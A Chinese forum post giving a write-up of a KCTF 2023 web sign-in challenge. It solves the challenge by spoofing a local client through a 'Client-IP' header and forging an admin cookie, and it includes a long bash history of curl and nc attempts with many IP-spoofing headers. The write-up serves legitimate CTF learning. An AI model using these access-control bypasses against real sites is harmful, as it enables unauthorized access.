-
-
[原创] 看雪 2023 KCTF 年度赛 签到题 生死较量
-
发表于: 2023-9-1 13:42 1141
-
页面提示的两个关键点:“本地” “管理员”
“本地”:用 'Client-IP: 127.0.0.1' http头 绕过
“管理员”:服务器响应有'Set-Cookie: user=guest',所以本地传一个 'Cookie: user=admin'
最终答案:
1 | curl - vvv - H 'Client-IP: 127.0.0.1' - H 'Cookie: user=admin' 'http://f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81/' |
以上wp针对懂web的人
.
附不懂web的人一个半小时的挣扎:(来自.bash_history)
(简直是有史以来做过的最难的签到题目)
.
历程:
cookie很容易发现,F12就能看到
(然后卡了若干分钟,此时前三血都出了)
注意到"本地",用极其有限的web题经验,想到X-Fowarded-For,试了无效
(继续卡十几分钟)
查到绕本地的http头很多,挨个试
(试到Clint-IP,响应终于有变化,但为什么还提示不是admin呢)
自闭
(走偏,看到php/5.5.9版本太低,开始疯狂试验 "PHP Development Server <= 7.4.21 - Remote Source Disclosure" )
404,原来1小时到了靶机自动关闭了。重启继续(显然,后面的host都变了)
(看到响应apache,知道无用)
……
.
看下面的最后两条命令,'Cookie: ...'前面漏了'-H',所以才会提示不是admin
.
..
...
结束,太心酸了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 | curl ' - H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' - H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' - H 'Cache-Control: max-age=0' - H 'Connection: keep-alive' - H 'Cookie: <redundant>; user=admin' - H 'Referer: - H 'Upgrade-Insecure-Requests: 1' - H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' - - compressed - - insecure curl - vvv ' curl - vvv - H 'Cookie: user=admin' ' curl - vvv - H 'Cookie: user=root' ' curl - vvv - H 'Cookie: user=administrator' ' curl - vvv - H 'Cookie: user=admin' ' curl - vvv - H 'Cookie: user=admin' ' curl - vvv - H 'Cookie: user=admin' ' curl - vvv - H 'X-Forwarded-For: 127.0.0.1' - H 'Cookie: user=admin' ' curl - vvv - H 'X-Forwarded-For: localhost' - H 'Cookie: user=admin' ' curl - vvv - H 'X-Forwarded-For: 127.0.0.1' - H 'Cookie: user=admin' ' curl - vvv - H 'X-Forwarded-For: 127.0.0.1,127.0.0.1' - H 'Cookie: user=admin' ' curl - vvv - H 'X-Forwarded-For: 127.0.0.1' http: / / 433bb7e5 - d7d7 - 4f99 - 9c4c - 2051a962d4af .node.kanxue.com: 81 / ' curl - vvv - H 'X-Forwarded-For: 127.0.0.1' ' curl ' - H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' - H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' - H 'Cache-Control: max-age=0' - H 'Connection: keep-alive' - H 'Cookie: <redundant>' - H 'Referer: - H 'Upgrade-Insecure-Requests: 1' - H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' - - compressed - - insecure curl ' - H 'X-Forwarded-For: 127.0.0.1' - H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' - H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' - H 'Cache-Control: max-age=0' - H 'Connection: keep-alive' - H 'Cookie: <redundant>' - H 'Referer: - H 'Upgrade-Insecure-Requests: 1' - H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' - - compressed - - insecure curl ' - H 'X-Forwarded-For: 127.0.0.1' - H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' - H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' - H 'Cache-Control: max-age=0' - H 'Connection: keep-alive' - H 'Cookie: <redundant>' - H 'Referer: - H 'Upgrade-Insecure-Requests: 1' - H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' - - compressed - - insecure curl ' - H 'X-Forwarded-For: 127.0.0.1' - H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' - H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' - H 'Cache-Control: max-age=0' - H 'Connection: keep-alive' - H 'Cookie: <redundant>' - H 'Referer: - H 'Upgrade-Insecure-Requests: 1' - H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' - - compressed - - insecure curl - vvv - H 'X-Forwarded-For: 127.0.0.1' ' curl - vvv - H 'X-Forwarded-For: 127.0.0.1,localhost' ' curl - vvv - H 'X-Forwarded-For: 127.0.0.1' - H 'Cookie: user=admin' ' curl - vvv - H 'X-Real-IP: 127.0.0.1' - H 'X-Forwarded-For: 127.0.0.1' - H 'Cookie: user=admin' ' curl - vvv - H 'X-Forwarded-For-Original: 127.0.0.1' - H 'X-Real-IP: 127.0.0.1' - H 'X-Forwarded-For: 127.0.0.1' - H 'Cookie: user=admin' ' curl - vvv - H 'X-Forwarded-Host: 127.0.0.1' - H 'X-Real-IP: 127.0.0.1' - H 'X-Forwarded-For: 127.0.0.1' - H 'Cookie: user=admin' ' curl - vvv - H 'X-Remote-IP: 127.0.0.1' - H 'X-Real-IP: 127.0.0.1' - H 'X-Forwarded-For: 127.0.0.1' - H 'Cookie: user=admin' ' curl - vvv - H 'X-Client-IP: 127.0.0.1' - H 'X-Real-IP: 127.0.0.1' - H 'X-Forwarded-For: 127.0.0.1' - H 'Cookie: user=admin' ' curl - vvv - H 'X-True-Client-IP: 127.0.0.1' - H 'X-Real-IP: 127.0.0.1' - H 'X-Forwarded-For: 127.0.0.1' - H 'Cookie: user=admin' ' curl - vvv - H 'X-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - vvv - H 'X-Gateway-Host: 127.0.0.1' 'Cookie: user=admin' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - vvv - H 'X-Gateway-Host: 127.0.0.1' 'Cookie: user=admin' ' curl - vvv - H 'X-Client-IP: 127.0.0.1' - H 'X-Real-IP: 127.0.0.1' - H 'X-Forwarded-For: 127.0.0.1' - H 'Cookie: user=admin' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=root' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user="' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=administrator' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - vvv http: / / 433bb7e5 - d7d7 - 4f99 - 9c4c - 2051a962d4af .node.kanxue.com: 81 / ' curl - vvv ' curl - vvv http: / / 433bb7e5 - d7d7 - 4f99 - 9c4c - 2051a962d4af .node.kanxue.com: 81 / ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;password=test123' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - - path - as - is - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - - path - as - is - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=Administrator' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=localadmin' ' curl - vvv - H 'Client-IP: 127.0.0.1' ' curl ' - H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' - H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' - H 'Cache-Control: max-age=0' - H 'Connection: keep-alive' - H 'Cookie: <redundant>' - H 'Referer: - H 'Upgrade-Insecure-Requests: 1' - H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' - - compressed - - insecure curl ' - H 'Client-IP: 127.0.0.1' - H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' - H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' - H 'Cache-Control: max-age=0' - H 'Connection: keep-alive' - H 'Cookie: <redundant>' - H 'Referer: - H 'Upgrade-Insecure-Requests: 1' - H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' - - compressed - - insecure curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - vvv - H 'X-Forwarded-For: 127.0.0.1' - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - d 'user=admin&pass=test123' - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' ' curl - d 'user=admin&pass=test123' - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' ' curl - d 'user=admin&pass=test123' - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' ' echo - ne 'GET / HTTP/1.1\r\nHost: 433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' | nc 433bb7e5 - d7d7 - 4f99 - 9c4c - 2051a962d4af .node.kanxue.com 81 echo - ne 'GET / HTTP/1.1\r\nHost: 433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' ' curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' 'http://f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81/' echo - ne 'GET / HTTP/1.1\r\nHost: /f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' | nc f46ea093 - 0509 - 428a - abb2 - 5fc891c5f094 .node.kanxue.com 81 echo - ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' | nc f46ea093 - 0509 - 428a - abb2 - 5fc891c5f094 .node.kanxue.com 81 echo - ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n' | nc f46ea093 - 0509 - 428a - abb2 - 5fc891c5f094 .node.kanxue.com 81 echo - ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n' echo - ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n' | nc f46ea093 - 0509 - 428a - abb2 - 5fc891c5f094 .node.kanxue.com 81 echo - ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n' echo - ne 'GET /getinfo.php HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n' | nc f46ea093 - 0509 - 428a - abb2 - 5fc891c5f094 .node.kanxue.com 81 echo - ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n' echo - ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' echo - ne 'GET /getinfo.php HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' | nc f46ea093 - 0509 - 428a - abb2 - 5fc891c5f094 .node.kanxue.com 81 curl - vvv - H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' 'http://f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81/' curl - vvv - H 'Client-IP: 127.0.0.1' - H 'Cookie: user=admin' 'http://f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81/' |
最后于 2023-9-1 13:49
被mb_mgodlfyn编辑
,原因:
赞赏
他的文章
看原图
赞赏
雪币:
留言: